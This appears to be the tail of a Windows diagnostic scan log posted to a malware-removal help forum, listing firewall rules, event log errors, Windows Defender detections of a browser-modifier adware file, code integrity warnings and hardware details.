FirewallRules: [{1E1617E6-3094-45CB-BC3B-99928F554A34}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE No File
FirewallRules: [{C8CF8DA6-393D-4D2A-8BE3-3947F033C1A9}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{9D9685CC-EA94-4BC6-876D-3D8270DE5F1C}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe No File
FirewallRules: [{55FD4156-2D42-4105-9587-A153B6A01521}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe (CyberLink Corp. -> CyberLink)
FirewallRules: [{6E4FFFC8-B968-48DF-970F-36508EB8FF7C}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe No File
FirewallRules: [{681998E0-5CB6-4E19-A6BC-30DE309E04D3}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{C063EF77-D9DE-4C9E-9F5D-F899661F3BE2}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{F52AB453-A2A8-4C7E-A994-67F89CF58A85}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe No File
FirewallRules: [{76F4F286-5BF0-418D-A8AB-650A8ED30018}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [TCP Query User{27211225-A696-49F7-90CA-2827010E7EBF}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{FFCA8B75-BFCB-4C4C-9272-6750CE03E4C6}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7904710B-852A-4399-9D5A-13B13E162407}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{0374141B-F51D-4A94-862F-9CAD437F2590}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{4D213123-3326-4C71-80E7-E89A0B0FBDE1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{B5EB9F1B-FB29-4CC8-946B-0437BEEC22C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6CFD723C-617F-4421-BD26-E847F8BAC7A6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CFAE1CFF-43F0-42CD-BF81-FDE50DD72009}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CD79AB71-EB67-4D84-924C-FB74A2A87A00}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{476D186D-995A-4AC1-BF49-B5EB04EF7886}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{ADBBB322-519B-460B-AB07-35385437BA27}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{6BC79577-0C73-4C3E-BF9C-22DCDBBDBD77}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{6495AAC7-BB0A-4D78-9207-A6341C53F190}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{C65E95A2-185B-46C7-B0D9-F9C77A816C1E}] => (Allow) LPort=5357
FirewallRules: [{E8B7E0C2-2A66-44FD-BA84-E47A77CCB3DA}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [TCP Query User{908C8609-488C-4742-9DD7-B4B65A3E3840}C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe] => (Allow) C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe (Seagate Technology LLC -> Seagate Technology LLC)
FirewallRules: [UDP Query User{3332F2C1-899B-49D3-A954-FE911F91ACF2}C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe] => (Allow) C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe (Seagate Technology LLC -> Seagate Technology LLC)
FirewallRules: [{CCDDA565-AD2F-4038-B2C3-0A9ABE23C1EE}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{4D7C48CD-9DA1-456D-9FC5-34237CE7C786}] => (Allow) C:\Users\JLO Squared\AppData\Local\Chromium\Application\chrome.exe No File
FirewallRules: [{1A2A6BDC-D44B-4AE6-95E8-1F2B125216F7}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{13F68EDE-1FC4-4551-B541-03C2949007C0}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3272241D-CA66-4279-BFE3-147F51F36BC7}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{4DD10FCB-50EE-4C4C-8994-540BFF93ABB2}] => (Allow) C:\Users\TEMP.Office\AppData\Local\Chromium\Application\chrome.exe No File
FirewallRules: [{5FF4E1A6-D489-4C1D-A0B4-82857AD6DEC6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

12-04-2020 10:18:39 Scheduled Checkpoint
15-04-2020 17:09:39 Windows Update
27-04-2020 12:24:58 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft Hyper-V Virtualization Infrastructure Driver
Description: Microsoft Hyper-V Virtualization Infrastructure Driver
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: Vid
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: ========================

Application errors:
==================
Error: (04/29/2020 12:06:27 PM) (Source: Microsoft-Windows-WMI) (EventID: 24) (User: NT AUTHORITY)
Description: Event provider $Core attempted to register query "select * from __InstanceOperationEvent" whose target class "__InstanceOperationEvent" in //./root namespace does not exist. The query will be ignored.

Error: (04/29/2020 12:00:07 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
Description: Windows cannot delete the profile directory C:\Users\TEMP.Office. This error may be caused by files in this directory being used by another program.

DETAIL - The directory is not empty.

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 522) (User: )
Description: StartMenuExperienceHost (9468,P,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied. ". The operation will fail with error -1032 (0xfffffbf8).

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 455) (User: )
Description: StartMenuExperienceHost (9468,R,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: Error -1023 (0xfffffc01) occurred while opening logfile C:\Users\TEMP.Office\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 522) (User: )
Description: StartMenuExperienceHost (9468,P,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied. ". The operation will fail with error -1032 (0xfffffbf8).

Error: (04/29/2020 11:53:17 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Office)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (04/29/2020 11:48:47 AM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7276,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (04/29/2020 11:37:16 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

System errors:
=============
Error: (04/29/2020 12:19:12 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (04/29/2020 12:18:07 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:49 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:38 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:24 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:01 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:16:35 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:16:03 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Windows Defender:
===================================
Date: 2020-03-03 16:06:10.892
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:06:04.605
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe; process:_pid:3128,ProcessStart:132277574638710176
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:04:49.461
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:04:41.586
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-02-29 17:20:15.831
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {7C751F37-B9DB-4614-8F9B-C95D7D4B86F6}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-01-17 00:28:48.150
Description:
Windows Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version:
Previous security intelligence Version: 1.307.2466.0
Update Source: Microsoft Update Server
Security intelligence Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.16600.7
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

CodeIntegrity:
===================================

Date: 2020-04-29 11:59:29.475
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:59:29.445
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:59:29.395
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:58:35.447
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.415
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.382
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.349
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.315
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

BIOS: AMI 80.06 04/01/2015
Motherboard: Hewlett-Packard 2B2C
Processor: Intel® Core™ i5-4460 CPU @ 3.20GHz
Percentage of memory in use: 20%
Total physical RAM: 12191.91 MB
Available physical RAM: 9639.31 MB
Total Virtual: 15647.91 MB
Available Virtual: 13397.6 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:910.16 GB) (Free:627.8 GB) NTFS
Drive d: (Recovery Image) (Fixed) (Total:19.03 GB) (Free:2.41 GB) NTFS ==>[system with boot components (obtained from drive)]

\\?\Volume{b0b03bc2-4981-4227-bc23-7ff36e0603e4}\ (Windows RE tools ) (Fixed) (Total:1 GB) (Free:0.69 GB) NTFS
\\?\Volume{1a45155e-4097-4181-b206-7d3a3c1a5357}\ () (Fixed) (Total:0.84 GB) (Free:0.41 GB) NTFS
\\?\Volume{2ad13087-dc91-427b-a535-4ba3e252b307}\ (SYSTEM) (Fixed) (Total:0.35 GB) (Free:0.28 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E6684562)

Partition: GPT.

==================== End of Addition.txt =======================

Edited by Oh My!, 29 April 2020 - 09:00 PM.
